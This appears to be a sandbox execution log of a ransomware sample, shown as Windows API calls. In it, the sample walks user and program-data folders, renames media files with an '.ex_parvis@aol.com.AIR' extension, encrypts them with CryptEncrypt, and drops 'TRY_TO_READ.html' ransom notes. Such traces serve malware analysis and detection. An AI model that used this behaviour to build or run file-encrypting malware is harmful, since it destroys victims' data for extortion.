	[0107.169] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4") returned 70
	[0107.169] GetProcessHeap () returned 0x540000
	[0107.169] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x57fb28
	[0107.169] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4"
	[0107.169] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.169] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\-q-c08dmtzq.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\-q-c08dmtzq.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.172] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\-Q-C08DmTzq.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\-q-c08dmtzq.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.172] GetProcessHeap () returned 0x540000
	[0107.172] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.172] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=61450) returned 1
	[0107.172] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf00a
	[0107.172] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.172] GetProcessHeap () returned 0x540000
	[0107.172] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.172] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.174] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.175] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.175] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.175] ReadFile (in: hFile=0x55c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xf00a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xf00a, lpOverlapped=0x0) returned 1
	[0107.177] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9bed040, ftCreationTime.dwHighDateTime=0x1d4d5a6, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe66048b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b01e0
	[0107.177] FindNextFileW (in: hFindFile=0x37b01e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9bed040, ftCreationTime.dwHighDateTime=0x1d4d5a6, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe66048b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.177] FindNextFileW (in: hFindFile=0x37b01e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x898b6430, ftCreationTime.dwHighDateTime=0x1d4cb46, ftLastAccessTime.dwLowDateTime=0x6b8cb7d0, ftLastAccessTime.dwHighDateTime=0x1d4c629, ftLastWriteTime.dwLowDateTime=0x6b8cb7d0, ftLastWriteTime.dwHighDateTime=0x1d4c629, nFileSizeHigh=0x0, nFileSizeLow=0x100fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hUll.flv", cAlternateFileName="")) returned 1
	[0107.177] FindNextFileW (in: hFindFile=0x37b01e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77820b50, ftCreationTime.dwHighDateTime=0x1d4d351, ftLastAccessTime.dwLowDateTime=0x74540e10, ftLastAccessTime.dwHighDateTime=0x1d4d2bb, ftLastWriteTime.dwLowDateTime=0x74540e10, ftLastWriteTime.dwHighDateTime=0x1d4d2bb, nFileSizeHigh=0x0, nFileSizeLow=0xe3e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="keamrM f7.avi", cAlternateFileName="KEAMRM~1.AVI")) returned 1
	[0107.178] FindNextFileW (in: hFindFile=0x37b01e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66048b0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe662aa10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.178] FindNextFileW (in: hFindFile=0x37b01e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66048b0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe662aa10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.178] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.178] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.178] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi", dwFileAttributes=0x80) returned 1
	[0107.178] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi") returned 56
	[0107.178] GetProcessHeap () returned 0x540000
	[0107.178] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x605bd0
	[0107.178] lstrcpyW (in: lpString1=0x605bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi"
	[0107.178] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.178] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\keamrm f7.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\keamrm f7.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.182] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\keamrM f7.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\keamrm f7.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560
	[0107.182] GetProcessHeap () returned 0x540000
	[0107.182] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x605bd0 | out: hHeap=0x540000) returned 1
	[0107.182] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=58341) returned 1
	[0107.182] SetFilePointer (in: hFile=0x560, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe3e5
	[0107.182] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.182] GetProcessHeap () returned 0x540000
	[0107.182] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.182] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.184] WriteFile (in: hFile=0x560, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.185] WriteFile (in: hFile=0x560, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.185] WriteFile (in: hFile=0x560, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.185] ReadFile (in: hFile=0x560, lpBuffer=0x629bb8, nNumberOfBytesToRead=0xe3e5, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0xe3e5, lpOverlapped=0x0) returned 1
	[0107.187] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.187] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.187] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv", dwFileAttributes=0x80) returned 1
	[0107.187] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv") returned 51
	[0107.187] GetProcessHeap () returned 0x540000
	[0107.187] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0107.187] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv"
	[0107.188] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.188] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\hull.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\hull.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.189] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VSKw\\hUll.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vskw\\hull.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560
	[0107.190] GetProcessHeap () returned 0x540000
	[0107.190] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0107.190] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=65788) returned 1
	[0107.190] SetFilePointer (in: hFile=0x560, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x100fc
	[0107.190] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.190] GetProcessHeap () returned 0x540000
	[0107.190] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.190] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.192] WriteFile (in: hFile=0x560, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.192] WriteFile (in: hFile=0x560, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.193] WriteFile (in: hFile=0x560, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.193] ReadFile (in: hFile=0x560, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x100fc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x100fc, lpOverlapped=0x0) returned 1
	[0107.195] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0220
	[0107.195] FindNextFileW (in: hFindFile=0x37b0220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.196] FindNextFileW (in: hFindFile=0x37b0220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1
	[0107.196] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\10.0\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564
	[0107.197] FindNextFileW (in: hFindFile=0x37b0220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6676cd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.197] FindNextFileW (in: hFindFile=0x37b0220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6676cd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.198] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0260
	[0107.198] FindNextFileW (in: hFindFile=0x37b0260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.198] FindNextFileW (in: hFindFile=0x37b0260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1
	[0107.198] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568
	[0107.201] FindNextFileW (in: hFindFile=0x37b0260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6676cd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.201] FindNextFileW (in: hFindFile=0x37b0260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6676cd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6676cd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6676cd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.201] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b02a0
	[0107.201] FindNextFileW (in: hFindFile=0x37b02a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.201] FindNextFileW (in: hFindFile=0x37b02a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 1
	[0107.201] FindNextFileW (in: hFindFile=0x37b02a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6bd1e50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
